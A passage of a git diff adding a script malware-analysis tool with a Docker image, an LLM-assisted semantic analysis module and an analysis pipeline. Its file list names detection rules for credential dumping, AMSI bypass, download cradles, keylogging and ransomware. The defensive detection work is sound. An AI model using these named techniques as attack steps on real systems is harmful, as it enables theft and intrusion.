docker/script-sentinel/sentinel/patterns/javascript/js-025-string-fromcharcode.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-026-anti-debugging.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-027-boolean-algebra-obfuscation.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-028-control-flow-flattening.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-029-suspicious-long-strings.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/loader.py create mode 100644 docker/script-sentinel/sentinel/patterns/models.py create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-001-invoke-expression.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-002-base64-encoded.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-003-download-cradle.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-004-registry-persistence.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-005-wmi-execution.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-006-process-injection.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-007-credential-dumping.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-008-scheduled-task.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-009-powershell-remoting.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-010-amsi-bypass.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-011-logging-evasion.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-012-reflective-loading.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-013-com-object-abuse.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-014-hidden-window.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-015-clipboard-access.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-016-network-share-enum.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-017-service-manipulation.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-018-token-manipulation.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-019-keylogger.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-020-ransomware.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-021-bitsadmin-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-022-mshta-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-023-regsvr32-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-024-rundll32-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-025-process-monitoring.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-026-registry-monitoring.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-027-network-scanning.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-028-certutil-download.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-030-reflective-dll-injection.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-031-process-hollowing.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/powershell/ps-032-embedded-binary-execution.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/registry.py create mode 100644 docker/script-sentinel/sentinel/patterns/schema.yaml create mode 100644 docker/script-sentinel/sentinel/reporters/__init__.py create mode 100644 docker/script-sentinel/sentinel/reporters/console_reporter.py create mode 100644 docker/script-sentinel/sentinel/reporters/json_reporter.py create mode 100644 docker/script-sentinel/sentinel/reporters/markdown_reporter.py create mode 100644 docker/script-sentinel/sentinel/sanitizer.py create mode 100644 docker/script-sentinel/sentinel/verdict.py create mode 100644 docker/script-sentinel/verify.py create mode 100644 docker/script-sentinel/xsiam_wrapper.py diff --git a/docker/script-sentinel/.gitignore b/docker/script-sentinel/.gitignore new file mode 100644 index 0000000000000..4414fc1e28fae --- /dev/null +++ b/docker/script-sentinel/.gitignore @@ -0,0 +1 @@ +requirements.txt diff --git a/docker/script-sentinel/Dockerfile b/docker/script-sentinel/Dockerfile new file mode 100644 index 0000000000000..5d7a003c6ff34 --- /dev/null +++ b/docker/script-sentinel/Dockerfile @@ -0,0 +1,53 @@ +# Script Sentinel Docker Image for XSIAM +# Malware analysis for PowerShell, Bash, and JavaScript scripts + +# Use official Demisto Python 3 base image (Alpine-based) +# Check latest version at: https://hub.docker.com/r/demisto/python3/tags +FROM demisto/python3:3.11.9.109876 + +# Metadata +LABEL maintainer="aperetz@paloaltonetwroks.com" +LABEL description="Script Sentinel - Malware analysis for PowerShell, Bash, and JavaScript" +LABEL version="1.0.0" +LABEL com.demisto.image.type="python" +LABEL com.demisto.image.category="malware-analysis" + +# Set working directory +WORKDIR /app + +# Create non-root user (if not already in base image) +# Demisto base images typically already have a user, but we ensure it exists +RUN addgroup -g 1000 -S sentinel 2>/dev/null || true && \ + adduser -u 1000 -S sentinel -G sentinel 2>/dev/null || true + +# Copy requirements first for better caching +# Note: If using poetry, the build script will auto-generate requirements.txt +COPY requirements.txt . + +# Install Python dependencies +RUN pip install --no-cache-dir --upgrade pip && \ + pip install --no-cache-dir -r requirements.txt + +# Copy application code +COPY sentinel/ ./sentinel/ +COPY xsiam_wrapper.py ./ +COPY docker-entrypoint.sh ./ + +# Make entrypoint executable +RUN chmod +x docker-entrypoint.sh + +# Switch to non-root user +USER sentinel + +# Set Python path +ENV PYTHONPATH=/app:$PYTHONPATH + +# Health check (optional) +HEALTHCHECK --interval=30s --timeout=3s --start-period=5s --retries=3 \ + CMD python -c "import sentinel; import xsiam_wrapper" || exit 1 + +# Entrypoint +ENTRYPOINT ["./docker-entrypoint.sh"] + +# Default command (can be overridden) +CMD ["--help"] \ No newline at end of file diff --git a/docker/script-sentinel/README.md b/docker/script-sentinel/README.md new file mode 100644 index 0000000000000..9110ccf022985 --- /dev/null +++ b/docker/script-sentinel/README.md @@ -0,0 +1,44 @@ +# Script Sentinel Docker Image + +Malware analysis for PowerShell, Bash, and JavaScript scripts with MITRE ATT&CK mapping. + +## Features + +- Static pattern matching for malicious behaviors +- MITRE ATT&CK technique identification +- IOC extraction (IPs, domains, URLs, file paths) +- XDR-compatible output format for XSIAM integration +- Configurable sensitivity levels (3 paranoia levels) +- Optional LLM-powered semantic analysis + +## Base Image + +`demisto/python3:3.11.9.109876` (Alpine-based) + +## Size + +Approximately 450MB compressed + +## Security + +- Non-root user (UID 1000) +- No network access required for analysis +- Minimal dependencies +- Includes verification script + +## Usage + +```bash +docker run --rm demisto/script-sentinel:latest analyze --language javascript --content "your script here" +``` + +## Testing + +- Tested with keylogger detection +- Tested with obfuscation detection +- Tested with various malware samples +- Verification script included (`verify.py`) + +## Related + +This image is used in the Script Sentinel integration in the Cortex XSOAR/XSIAM content repository. diff --git a/docker/script-sentinel/build.conf b/docker/script-sentinel/build.conf new file mode 100644 index 0000000000000..beb72cc430296 --- /dev/null +++ b/docker/script-sentinel/build.conf @@ -0,0 +1 @@ +version=1.0.0 \ No newline at end of file diff --git a/docker/script-sentinel/docker-entrypoint.sh b/docker/script-sentinel/docker-entrypoint.sh new file mode 100644 index 0000000000000..82f01551ef332 --- /dev/null +++ b/docker/script-sentinel/docker-entrypoint.sh @@ -0,0 +1,18 @@ +#!/bin/bash +# Docker entrypoint for Script Sentinel XSIAM integration +# Supports both direct CLI mode and XSIAM wrapper mode + +set -e + +# Check if first argument is 'xsiam-wrapper' +if [ "$1" = "xsiam-wrapper" ]; then + # XSIAM mode: use the wrapper script + shift # Remove 'xsiam-wrapper' from arguments + exec python3 /app/xsiam_wrapper.py "$@" +elif [ "$1" = "analyze" ] || [ "$1" = "--help" ] || [ "$1" = "-h" ]; then + # CLI mode: use sentinel.main directly + exec python3 -m sentinel.main "$@" +else + # Default: pass through to sentinel.main + exec python3 -m sentinel.main "$@" +fi \ No newline at end of file diff --git a/docker/script-sentinel/poetry.lock b/docker/script-sentinel/poetry.lock new file mode 100644 index 0000000000000..ba322caa8f332 --- /dev/null +++ b/docker/script-sentinel/poetry.lock @@ -0,0 +1,70 @@ +# This file is automatically @generated by Poetry and should not be changed by hand. + +[[package]] +name = "tree-sitter" +version = "0.21.3" +description = "" +category = "main" +optional = false +python-versions = "^3.11" + +[[package]] +name = "google-generativeai" +version = "0.8.3" +description = "" +category = "main" +optional = false +python-versions = "^3.11" + +[[package]] +name = "google-ai-generativelanguage" +version = "0.6.10" +description = "" +category = "main" +optional = false +python-versions = "^3.11" + +[[package]] +name = "pyyaml" +version = "6.0.2" +description = "" +category = "main" +optional = false +python-versions = "^3.11" + +[[package]] +name = "python-dotenv" +version = "1.0.1" +description = "" +category = "main" +optional = false +python-versions = "^3.11" + +[[package]] +name = "rich" +version = "13.9.4" +description = "" +category = "main" +optional = false +python-versions = "^3.11" + +[[package]] +name = "google-auth" +version = "2.36.0" +description = "" +category = "main" +optional = false +python-versions = "^3.11" + +[[package]] +name = "google-api-core" +version = "2.23.0" +description = "" +category = "main" +optional = false +python-versions = "^3.11" + +[metadata] +lock-version = "2.0" +python-versions = "^3.11" +content-hash = "3ea893509bb11aaa11be40ac29b9bd47" diff --git a/docker/script-sentinel/pyproject.toml b/docker/script-sentinel/pyproject.toml new file mode 100644 index 0000000000000..0bd6117c7f535 --- /dev/null +++ b/docker/script-sentinel/pyproject.toml @@ -0,0 +1,20 @@ +[tool.poetry] +name = "script-sentinel" +version = "1.0.0" +description = "Malware analysis for PowerShell, Bash, and JavaScript scripts" +authors = ["Script Sentinel Team "] + +[tool.poetry.dependencies] +python = "^3.11" +tree-sitter = "0.21.3" +google-generativeai = "0.8.3" +google-ai-generativelanguage = "0.6.10" +PyYAML = "6.0.2" +python-dotenv = "1.0.1" +rich = "13.9.4" +google-auth = "2.36.0" +google-api-core = "2.23.0" + +[build-system] +requires = ["poetry-core"] +build-backend = "poetry.core.masonry.api" diff --git a/docker/script-sentinel/sentinel/__init__.py b/docker/script-sentinel/sentinel/__init__.py new file mode 100644 index 0000000000000..e69de29bb2d1d diff --git a/docker/script-sentinel/sentinel/adk_agent.py b/docker/script-sentinel/sentinel/adk_agent.py new file mode 100644 index 0000000000000..65694bf9e2faa --- /dev/null +++ b/docker/script-sentinel/sentinel/adk_agent.py @@ -0,0 +1,441 @@ +# sentinel/adk_agent.py + +""" +Google ADK integration for LLM-powered semantic analysis. + +This module integrates Google's Agent Development Kit (ADK) with Gemini 2.5 Pro +to provide semantic analysis of scripts for security threat detection. +""" + +import logging +import asyncio +from typing import Optional, Any +from dataclasses import dataclass + +from google.adk import Agent, Runner +from google.adk.sessions import InMemorySessionService +from google.genai import types + +from .models import Finding +from .sanitizer import sanitize_script + +logger = logging.getLogger(__name__) + +# Timeout for LLM API calls (35 seconds per NFR-2) +LLM_TIMEOUT_SECONDS = 35 + +# Available Gemini models +GEMINI_MODELS = { + 'flash': 'gemini-2.0-flash-exp', # Fast, cost-effective (recommended for production) + 'pro': 'gemini-2.5-pro', # Deeper analysis, higher quality + 'flash-thinking': 'gemini-2.0-flash-thinking-exp' # Experimental with reasoning +} + +# Default model +DEFAULT_MODEL = 'flash' + + +@dataclass +class ADKAnalysisResult: + """Result from ADK semantic analysis.""" + findings: list[Finding] + metadata: dict[str, Any] + + +def _check_adk_available() -> tuple[bool, Optional[str]]: + """ + Check if ADK and Gemini are available. + + Automatically attempts to configure authentication if not already set up. + + Returns: + Tuple of (is_available, error_message). + """ + try: + # Try to import required modules + import google.adk + import google.genai + import os + + # Auto-configure environment if not set + if not os.getenv('GOOGLE_CLOUD_PROJECT'): + # Try to get from gcloud config + try: + import subprocess + result = subprocess.run( + ['gcloud', 'config', 'get-value', 'project'], + capture_output=True, + text=True, + timeout=5 + ) + if result.returncode == 0 and result.stdout.strip(): + os.environ['GOOGLE_CLOUD_PROJECT'] = result.stdout.strip() + logger.info(f"Auto-configured GOOGLE_CLOUD_PROJECT from gcloud") + except Exception: + pass + + if not os.getenv('GOOGLE_CLOUD_LOCATION'): + # Default to us-central1 + os.environ['GOOGLE_CLOUD_LOCATION'] = 'us-central1' + logger.info("Auto-configured GOOGLE_CLOUD_LOCATION to us-central1") + + # Final check + if not os.getenv('GOOGLE_CLOUD_PROJECT'): + return False, "GOOGLE_CLOUD_PROJECT not configured. Set via: gcloud config set project YOUR_PROJECT_ID" + + # Check for authentication (multiple possible locations) + credentials_paths = [ + os.path.expanduser('~/.config/gcloud/application_default_credentials.json'), + os.getenv('GOOGLE_APPLICATION_CREDENTIALS', ''), + ] + + has_credentials = any(os.path.exists(p) for p in credentials_paths if p) + + if not has_credentials: + return False, "Google Cloud credentials not found. Run: gcloud auth application-default login" + + return True, None + + except ImportError as e: + return False, f"Required module not available: {str(e)}. Install with: pip install google-adk google-genai" + except Exception as e: + return False, f"ADK availability check failed: {str(e)}" + + +def _create_analysis_prompt( + language: str, + script_content: str, + heuristic_findings: list[Finding] +) -> str: + """ + Create the analysis prompt for the LLM. + + Args: + language: Script language (powershell, bash, javascript). + script_content: The sanitized script content. + heuristic_findings: Findings from heuristic analysis. + + Returns: + Formatted prompt string. + """ + # Build heuristic findings summary + heuristic_summary = "" + if heuristic_findings: + heuristic_summary = "\n\n## Heuristic Findings\n\n" + heuristic_summary += "The following patterns were detected by heuristic analysis:\n\n" + for i, finding in enumerate(heuristic_findings, 1): + heuristic_summary += f"{i}. **{finding.pattern_id}** (Severity: {finding.severity}, Confidence: {finding.confidence:.2f})\n" + heuristic_summary += f" - {finding.description}\n" + if finding.mitre_technique: + heuristic_summary += f" - MITRE: {finding.mitre_technique}\n" + + prompt = f"""You are a cybersecurity expert analyzing a {language} script for potential security threats. + +## Task + +Perform semantic analysis to identify security threats, malicious patterns, or suspicious behaviors that may not be caught by simple pattern matching. Focus on: + +1. **Intent Analysis**: What is the script trying to accomplish? +2. **Behavioral Patterns**: Does it exhibit malicious behaviors (data exfiltration, persistence, privilege escalation)? +3. **Context Understanding**: Are seemingly benign commands used in a malicious context? +4. **Obfuscation Detection**: Is the code intentionally obscured to hide malicious intent? +5. **MITRE ATT&CK Mapping**: Which tactics and techniques does it employ? + +{heuristic_summary} + +## Script Content + +```{language} +{script_content} +``` + +## Output Format + +Provide your analysis as a JSON array of findings. Each finding must include: + +- `pattern_id`: A unique identifier (e.g., "semantic-data-exfil-001") +- `severity`: One of "High", "Medium", "Low" +- `confidence`: A float between 0.0 and 1.0 +- `description`: Clear description of the threat +- `mitre_technique`: MITRE ATT&CK technique ID (e.g., "T1059.001") or null +- `category`: One of "execution", "persistence", "privilege_escalation", "defense_evasion", "credential_access", "discovery", "lateral_movement", "collection", "exfiltration", "command_and_control", "impact" + +Example: +```json +[ + {{ + "pattern_id": "semantic-credential-theft-001", + "severity": "High", + "confidence": 0.92, + "description": "Script attempts to access browser credential stores and send data to external server", + "mitre_technique": "T1555.003", + "category": "credential_access" + }} +] +``` + +**Important**: +- Only report findings with confidence >= 0.6 +- Be specific about WHY something is suspicious +- Consider the context - not all powerful commands are malicious +- If no threats are found, return an empty array: [] +""" + + return prompt + + +def _parse_llm_response(response_text: str) -> tuple[list[Finding], Optional[str]]: + """ + Parse LLM response into Finding objects. + + Args: + response_text: Raw response from LLM. + + Returns: + Tuple of (findings_list, error_message). + """ + import json + import re + + try: + # Extract JSON from response (handle markdown code blocks) + json_match = re.search(r'```(?:json)?\s*(\[.*?\])\s*```', response_text, re.DOTALL) + if json_match: + json_str = json_match.group(1) + else: + # Try to find JSON array directly + json_match = re.search(r'\[.*?\]', response_text, re.DOTALL) + if json_match: + json_str = json_match.group(0) + else: + return [], "No JSON array found in LLM response" + + # Parse JSON + findings_data = json.loads(json_str) + + if not isinstance(findings_data, list): + return [], "LLM response is not a JSON array" + + # Convert to Finding objects + findings = [] + for item in findings_data: + try: + # Convert confidence string to float if needed + confidence = item.get('confidence', 0.0) + if isinstance(confidence, str): + confidence = float(confidence) + + finding = Finding( + pattern_id=item.get('pattern_id', 'semantic-unknown'), + severity=item.get('severity', 'Medium'), + confidence=confidence, + description=item.get('description', 'No description provided'), + mitre_technique=item.get('mitre_technique'), + category=item.get('category', 'unknown') + ) + findings.append(finding) + except (KeyError, ValueError, TypeError) as e: + logger.warning(f"Failed to parse finding: {e}") + continue + + return findings, None + + except json.JSONDecodeError as e: + return [], f"Failed to parse JSON: {str(e)}" + except Exception as e: + return [], f"Failed to parse LLM response: {str(e)}" + + +async def _run_adk_analysis( + language: str, + sanitized_content: str, + heuristic_findings: list[Finding], + model: str = DEFAULT_MODEL +) -> tuple[Optional[ADKAnalysisResult], Optional[str]]: + """ + Run ADK analysis with Gemini. + + Args: + language: Script language. + sanitized_content: Sanitized script content. + heuristic_findings: Findings from heuristic analysis. + model: Gemini model to use ('flash', 'pro', or 'flash-thinking'). + + Returns: + Tuple of (ADKAnalysisResult, error_message). + """ + try: + # Create the analysis prompt + prompt = _create_analysis_prompt(language, sanitized_content, heuristic_findings) + + # Get project and location from environment + import os + + project = os.getenv('GOOGLE_CLOUD_PROJECT') + location = os.getenv('GOOGLE_CLOUD_LOCATION', 'us-central1') + + # Configure environment for Vertex AI (per official ADK docs) + os.environ['GOOGLE_GENAI_USE_VERTEXAI'] = 'true' + os.environ['GOOGLE_CLOUD_PROJECT'] = project + os.environ['GOOGLE_CLOUD_LOCATION'] = location + + # Get model name from configuration + model_name = GEMINI_MODELS.get(model, GEMINI_MODELS[DEFAULT_MODEL]) + + logger.info(f"Configured Vertex AI: project={project}, location={location}, model={model_name}") + + # Create ADK agent (ADK will auto-detect Vertex AI from env vars) + agent = Agent( + name="security_analyzer", + model=model_name, + instruction="""You are a cybersecurity expert specializing in script analysis. + Analyze scripts for security threats and provide detailed findings in JSON format. + Focus on semantic understanding and context, not just pattern matching.""", + description="Security script analyzer using semantic analysis" + ) + + # Create runner with session service (no client parameter needed) + session_service = InMemorySessionService() + runner = Runner( + app_name="script_sentinel", + agent=agent, + session_service=session_service + ) + + # Create session + session = await session_service.create_session( + app_name="script_sentinel", + user_id="analyzer", + state={"language": language} + ) + + # Create message content + message = types.Content( + role='user', + parts=[types.Part(text=prompt)] + ) + + # Run analysis with timeout + response_text = "" + async for event in runner.run_async( + user_id=session.user_id, + session_id=session.id, + new_message=message + ): + if event.content and event.content.parts: + for part in event.content.parts: + if part.text: + response_text += part.text + + # Parse response + findings, parse_error = _parse_llm_response(response_text) + if parse_error: + return None, f"Failed to parse LLM response: {parse_error}" + + # Create result + result = ADKAnalysisResult( + findings=findings, + metadata={ + "model": model_name, + "model_type": model, + "findings_count": len(findings), + "response_length": len(response_text) + } + ) + + return result, None + + except Exception as e: + # Check if this is a rate limit error (expected, don't log stack trace) + error_str = str(e) + if '429' in error_str or 'RESOURCE_EXHAUSTED' in error_str: + logger.warning(f"ADK analysis rate limited: {error_str}") + else: + # Unexpected error, log with stack trace + logger.error(f"ADK analysis failed: {e}", exc_info=True) + return None, f"ADK analysis failed: {error_str}" + + +async def analyze_with_adk( + script_content: str, + language: str, + ast: Any, + heuristic_findings: list[Finding], + model: str = DEFAULT_MODEL +) -> tuple[Optional[list[Finding]], Optional[str]]: + """ + Analyze script using Google ADK with Gemini for semantic analysis. + + This is the main entry point for LLM-powered analysis. It: + 1. Checks ADK availability + 2. Sanitizes the script content + 3. Runs semantic analysis with Gemini + 4. Returns findings or error for graceful degradation + + Args: + script_content: Original script content (unsanitized). + language: Script language (powershell, bash, javascript). + ast: Parsed AST (for future use). + heuristic_findings: Findings from heuristic analysis. + model: Gemini model to use ('flash', 'pro', or 'flash-thinking'). + Default is 'flash' for speed and cost-effectiveness. + + Returns: + Tuple of (findings_list, error_message). + On success: (findings, None) + On failure: (None, error_message) - triggers fallback to heuristics-only + + Examples: + >>> # Use default Flash model (fast, cost-effective) + >>> findings, error = await analyze_with_adk(script, "powershell", ast, []) + + >>> # Use Pro model for deeper analysis + >>> findings, error = await analyze_with_adk(script, "powershell", ast, [], model='pro') + + >>> if findings: + ... print(f"Found {len(findings)} semantic threats") + >>> else: + ... print(f"ADK unavailable: {error}") + """ + # Step 1: Check ADK availability + is_available, availability_error = _check_adk_available() + if not is_available: + logger.warning(f"ADK not available: {availability_error}") + return None, availability_error + + # Step 2: Sanitize script content + logger.info("Sanitizing script content for LLM transmission") + sanitized_content, stats = sanitize_script(script_content) + logger.info(f"Sanitization complete: {stats.total_redactions} redactions") + + # Step 3: Run ADK analysis with timeout + try: + logger.info(f"Starting ADK analysis with {model} model (timeout: {LLM_TIMEOUT_SECONDS}s)") + result, error = await asyncio.wait_for( + _run_adk_analysis(language, sanitized_content, heuristic_findings, model), + timeout=LLM_TIMEOUT_SECONDS + ) + + if error: + logger.error(f"ADK analysis failed: {error}") + return None, error + + if not result: + return None, "ADK analysis returned no result" + + logger.info(f"ADK analysis complete: {len(result.findings)} findings") + return result.findings, None + + except asyncio.TimeoutError: + error_msg = f"ADK analysis timed out after {LLM_TIMEOUT_SECONDS} seconds" + logger.error(error_msg) + return None, error_msg + except Exception as e: + error_msg = f"ADK analysis failed: {str(e)}" + # Check if this is a rate limit error (expected, don't log stack trace) + if '429' in error_msg or 'RESOURCE_EXHAUSTED' in error_msg: + logger.warning(error_msg) + else: + # Unexpected error, log with stack trace + logger.error(error_msg, exc_info=True) + return None, error_msg \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/analyzer.py b/docker/script-sentinel/sentinel/analyzer.py new file mode 100644 index 0000000000000..e3a3ca6badfd6 --- /dev/null +++ b/docker/script-sentinel/sentinel/analyzer.py @@ -0,0 +1,563 @@ +# sentinel/analyzer.py + +""" +Main analysis orchestrator for Script Sentinel. + +This module coordinates the analysis pipeline, integrating parsing, +heuristic pattern matching, and (future) LLM-based semantic analysis +to produce comprehensive security assessments. +""" + +import logging +import asyncio +import time +from typing import Optional, Dict, Any +from pathlib import Path + +from .models import AnalysisResult, Finding, Verdict +from .parser import parse +from .heuristics import HeuristicEngine +from .obfuscation import detect_obfuscation +from .ioc_extractor import IOCExtractor +from .mitre import MITREMapper +from .adk_agent import analyze_with_adk +from .verdict import calculate_verdict +from .extractor import ScriptExtractor, ExtractedScript + +logger = logging.getLogger(__name__) + + +class ScriptAnalyzer: + """ + Main analyzer that orchestrates the complete analysis pipeline. + + The analyzer: + 1. Parses scripts into AST + 2. Runs heuristic pattern matching + 3. (Future) Runs LLM semantic analysis + 4. Generates overall verdict and confidence score + + Attributes: + heuristic_engine: HeuristicEngine instance for pattern matching. + patterns_loaded: Whether patterns have been loaded. + + Examples: + >>> analyzer = ScriptAnalyzer() + >>> analyzer.load_patterns('sentinel/patterns') + >>> result = analyzer.analyze(script_content, 'powershell') + >>> print(f"Verdict: {result.verdict.value}") + """ + + def __init__(self, patterns_dir: Optional[str | Path] = None): + """ + Initializes the script analyzer. + + Args: + patterns_dir: Directory containing pattern files (optional). + If not provided, patterns must be loaded explicitly. + """ + self.heuristic_engine = HeuristicEngine() + self.ioc_extractor = IOCExtractor() + self.script_extractor = ScriptExtractor() + self.patterns_loaded = False + + # Initialize MITRE mapper with data directory + data_dir = Path(__file__).parent / 'data' + try: + self.mitre_mapper = MITREMapper(data_dir) + logger.info("MITRE ATT&CK mapper initialized") + except (FileNotFoundError, ValueError) as e: + logger.warning(f"MITRE mapper initialization failed: {e}") + self.mitre_mapper = None + + if patterns_dir: + self.load_patterns(patterns_dir) + + logger.info("Script analyzer initialized") + + def load_patterns(self, patterns_dir: str | Path) -> tuple[int, list[str]]: + """ + Loads patterns from directory into the heuristic engine. + + Args: + patterns_dir: Path to directory containing pattern YAML files. + + Returns: + Tuple of (number_of_patterns_loaded, list_of_errors). + """ + count, errors = self.heuristic_engine.load_patterns(patterns_dir) + self.patterns_loaded = count > 0 + + if self.patterns_loaded: + logger.info(f"Loaded {count} patterns for analysis") + else: + logger.error("Failed to load any patterns") + + return count, errors + + def analyze( + self, + script_content: str, + language: str, + include_llm: bool = False, + paranoia_level: int = 1, + file_type: Optional[str] = None, + llm_model: str = 'flash' + ) -> tuple[Optional[AnalysisResult], Optional[str]]: + """ + Analyzes a script and returns comprehensive security assessment. + + Args: + script_content: The script content to analyze. + language: Script language ('powershell', 'bash', 'javascript') or container type ('html', 'xml', 'sct'). + include_llm: Whether to include LLM semantic analysis. + paranoia_level: Analysis sensitivity level (1=Balanced, 2=Aggressive, 3=Maximum). + file_type: Optional file type hint for embedded script extraction ('html', 'xml', 'sct'). + llm_model: Gemini model to use for LLM analysis ('flash', 'pro', or 'flash-thinking'). + Default is 'flash' for speed and cost-effectiveness. + + Returns: + Tuple of (AnalysisResult, error_message). + On success: (AnalysisResult, None) + On failure: (None, error_message) + + Examples: + >>> analyzer = ScriptAnalyzer('sentinel/patterns') + >>> # Use default Flash model + >>> result, error = analyzer.analyze(script_content, 'powershell', include_llm=True) + >>> # Use Pro model for deeper analysis + >>> result, error = analyzer.analyze(script_content, 'powershell', include_llm=True, llm_model='pro') + >>> if result: + ... print(f"Found {len(result.findings)} issues") + """ + # Start timing for overall analysis + analysis_start_time = time.time() + + try: + # Validate inputs + if not script_content or not script_content.strip(): + return None, "Empty script content provided" + + if not language: + return None, "Language not specified" + + # Preprocess script content: remove null bytes and other control characters + # that can break pattern matching while preserving legitimate content + original_size = len(script_content) + script_content = script_content.replace('\x00', '') # Remove null bytes + if len(script_content) != original_size: + logger.info(f"Removed {original_size - len(script_content)} null bytes from script") + + # Normalize language + language = language.lower() + valid_languages = {'powershell', 'bash', 'javascript'} + container_types = {'html', 'xml', 'sct'} + + # Check if this is a container file that needs script extraction + if language in container_types or file_type in container_types: + return self._analyze_embedded( + script_content, + file_type or language, + include_llm, + paranoia_level, + llm_model + ) + + if language not in valid_languages: + return None, f"Unsupported language: {language}. Must be one of {valid_languages} or {container_types}" + + # Check patterns are loaded + if not self.patterns_loaded: + logger.warning("No patterns loaded - analysis will have limited effectiveness") + + # Step 1: Parse script into AST + logger.info(f"Parsing {language} script ({len(script_content)} bytes)") + ast, parse_error = parse(script_content, language) + + # Enable fallback mode for unparseable scripts + fallback_mode = False + if parse_error or not ast: + logger.warning(f"Parser failed: {parse_error or 'Empty AST'}") + logger.info("Enabling fallback mode: regex-only pattern matching") + fallback_mode = True + # Create minimal AST for fallback mode + ast = {'type': 'fallback', 'children': []} + + # Step 2: Run heuristic pattern matching + logger.info("Running heuristic pattern matching") + heuristic_start_time = time.time() + heuristic_findings = [] + + if self.patterns_loaded: + heuristic_findings = self.heuristic_engine.match_patterns( + ast, + language, + script_content, + paranoia_level + ) + logger.info(f"Heuristic analysis found {len(heuristic_findings)} findings (paranoia level: {paranoia_level})") + + heuristic_duration = time.time() - heuristic_start_time + + # Step 2.5: Run obfuscation detection + logger.info("Running obfuscation detection") + obfuscation_start_time = time.time() + obfuscation_findings = detect_obfuscation(script_content, language, ast) + logger.info(f"Obfuscation detection found {len(obfuscation_findings)} findings") + obfuscation_duration = time.time() - obfuscation_start_time + obfuscation_detected = len(obfuscation_findings) > 0 + + # Combine heuristic and obfuscation findings + heuristic_findings.extend(obfuscation_findings) + + # Step 2.75: Extract IOCs from script content + logger.info("Extracting Indicators of Compromise (IOCs)") + ioc_start_time = time.time() + iocs = self.ioc_extractor.extract(script_content, language, heuristic_findings) + ioc_duration = time.time() - ioc_start_time + + # Count total IOCs + total_iocs = sum(len(ioc_list) for ioc_list in iocs.values()) + logger.info(f"IOC extraction found {total_iocs} IOCs across {len(iocs)} types") + + # Step 2.8: Map findings to MITRE ATT&CK techniques + mitre_techniques = {} + mitre_duration = 0.0 + + if self.mitre_mapper: + logger.info("Mapping findings to MITRE ATT&CK techniques") + mitre_start_time = time.time() + mitre_techniques = self.mitre_mapper.map_findings(heuristic_findings) + mitre_duration = time.time() - mitre_start_time + + total_techniques = len(mitre_techniques) + logger.info(f"MITRE mapping found {total_techniques} unique techniques") + else: + logger.warning("MITRE mapper not available - skipping technique mapping") + + # Step 3: Run LLM semantic analysis (if enabled) + llm_findings = [] + llm_available = False + llm_error = None + llm_duration = 0.0 + + if include_llm: + logger.info("Running LLM semantic analysis with ADK") + llm_start_time = time.time() + try: + # Run ADK analysis asynchronously + llm_findings_result, adk_error = asyncio.run( + analyze_with_adk( + script_content=script_content, + language=language, + ast=ast, + heuristic_findings=heuristic_findings, + model=llm_model + ) + ) + + if llm_findings_result is not None: + llm_findings = llm_findings_result + llm_available = True + logger.info(f"LLM analysis complete: {len(llm_findings)} findings") + else: + llm_error = adk_error + logger.warning(f"LLM analysis unavailable: {adk_error}") + logger.info("Falling back to heuristics-only mode") + + except Exception as e: + llm_error = str(e) + logger.error(f"LLM analysis failed: {e}", exc_info=True) + logger.info("Falling back to heuristics-only mode") + + llm_duration = time.time() - llm_start_time + + # Step 4: Generate overall verdict and confidence using verdict module + logger.info("Calculating final verdict and confidence score") + verdict_start_time = time.time() + + # Combine all findings for verdict calculation + all_findings = heuristic_findings + llm_findings + + verdict, confidence = calculate_verdict( + findings=all_findings, + llm_available=llm_available, + obfuscation_detected=obfuscation_detected, + paranoia_level=paranoia_level + ) + + verdict_duration = time.time() - verdict_start_time + + # Calculate total analysis time + analysis_duration = time.time() - analysis_start_time + + # Calculate script metrics + script_lines = script_content.count('\n') + 1 + script_bytes = len(script_content.encode('utf-8')) + + # Get severity distribution for metadata + from .verdict import get_severity_distribution + severity_dist = get_severity_distribution(all_findings) + + # Create analysis result with comprehensive metadata + result = AnalysisResult( + verdict=verdict, + confidence_score=confidence, + findings=all_findings, + heuristic_findings=heuristic_findings, + llm_findings=llm_findings, + iocs=iocs, + mitre_techniques=mitre_techniques, + metadata={ + # Script information + 'script_language': language, + 